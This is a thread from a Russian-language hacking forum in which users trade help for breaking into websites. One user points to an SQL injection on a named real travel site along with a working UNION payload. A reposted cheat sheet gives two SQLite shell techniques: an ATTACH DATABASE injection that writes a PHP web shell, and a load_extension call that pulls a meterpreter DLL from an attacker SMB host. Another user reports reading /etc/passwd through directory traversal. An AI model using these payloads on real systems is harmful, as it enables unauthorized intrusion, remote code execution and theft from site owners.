ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ну как залить шелл там пример есть, а путь узнаешь сделав запрос echo realpath("."); ну или в phpinfo посмотреть.

а можно узнать где такой запрос сделать? майскул уже научилась выполнять пхп скрипты?

ну если б вы внимательно читали пост M1ks, то не задавали бы такой "умный" вопрос.

Он написал, что сделал sql запрос

из этого поста /showpost.php?p=2064084&postcount=25

Теперь ему надо залить шелл, а путь не знает

по скольку он сделал этот sql запрос, можно узнать путь: profile.php?mode=editprofile&c=echo realpath("."); или вывести инфу пхп mode=editprofile&c=phpinfo(); и там смотреть путь.

доброго времени суток товарищи. скажите пожалуйста есть ли тут инъекция http://www.swtravel.az/index.php?ind=newsfull&id=118' если да то направьте на правильном пути , а то я не смог количество колонок подобрать

http://www.swtravel.az/index.php?stype=a&slevel=1&sid=-11%20union%20select%20@@version,2,3--

инъекция в SQLite. Обычная UNION-based.

Никогда с ними не сталкивался. Таблы вытянул из sqlite_master. Как вытянуть колонки?

Читал про какуй-то альтернативный метод залития шелла. LOAD_EXTENSION()

Но не совсем понял, как он работает. Дайте доков по сабжу.

2 способа получения шелла на SQLite

Getting Shell Trick 1 - ATTACH DATABASE

What it says on the tin - lets you attach another database for your querying pleasure. Attach another known db on the filesystem that contains interesting stuff - e.g. a configuration database. Better yet - if the designated file doesn't exist, it will be created. You can create this file anywhere on the filesystem that you have write access to. PHP example:

?id=bob’; ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘’;--

Then of course you can just visit lol.php?cmd=id and enjoy code exec! This requires stacked queries to be a goer.

Теперь по-русски. Приведённый запрос пытается подключить дополнительную БД ( указанную в файле /var/www/lol.php ) в твой запрос к БД. Если этот файл отсутствует, он автоматически создастся - то, что нам и надо.

Зависимости:

MQ=off

Full_path_disclosure=1

Getting Shell Trick 2 - SELECT load_extension

Takes two arguments:

A library (.dll for Windows, .so for NIX)

An entry point (SQLITE_EXTENSION_INIT1 by default)

This is great because

This technique doesn't require stacked queries

The obvious - you can load a DLL right off the bat (meterpreter.dll?

Unfortunately, this component of SQLite is disabled in the libraries by default. SQLite devs saw the exploitability of this and turned it off. However, some custom libraries have it enabled - for example, one of the more popular Windows ODBC drivers. To make this even better, this particular injection works with UNC paths - so you can remotely load a nasty library over SMB (provided the target server can speak SMB to the Internets). Example:

?name=123 UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter .dll','DllMain');--

В этом примере используется Samba протокол для доступа к хосту злоумышленника, где в качестве плагина для SQLite скачаивает "ядовитую" начинку. Тут нужно обратить внимание с какой ОС Вы имеете дело - либо Windows (тогда расширение у файла должно быть .dll ), либо Unix (расширение .so соответственно).

Proof = _ttps://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet

Добрый день, помогите новичку

Нашел directory traversal на сайте, прочитал файл /etc/passwd, (пароли в /etc/shadow не прочитал), нашел httpd.conf, посмотрел реврайт рулы, список виртуальных хостов и всякие другие дефолтные файлы. Прочитал /bin/sh, а вот как его запустить на выполнение? Или хотя-бы как-то посмотреть дерево каталогов и файлов. Короче, уткнулся в то, что не могу /bin/sh запустить на выполнение, но подозреваю, что это можно сделать, ведь его содержимое я прочитал.

Спасибо

Если у тебя права только на чтение файлов, то единственное что ты можешь делать - читать файлы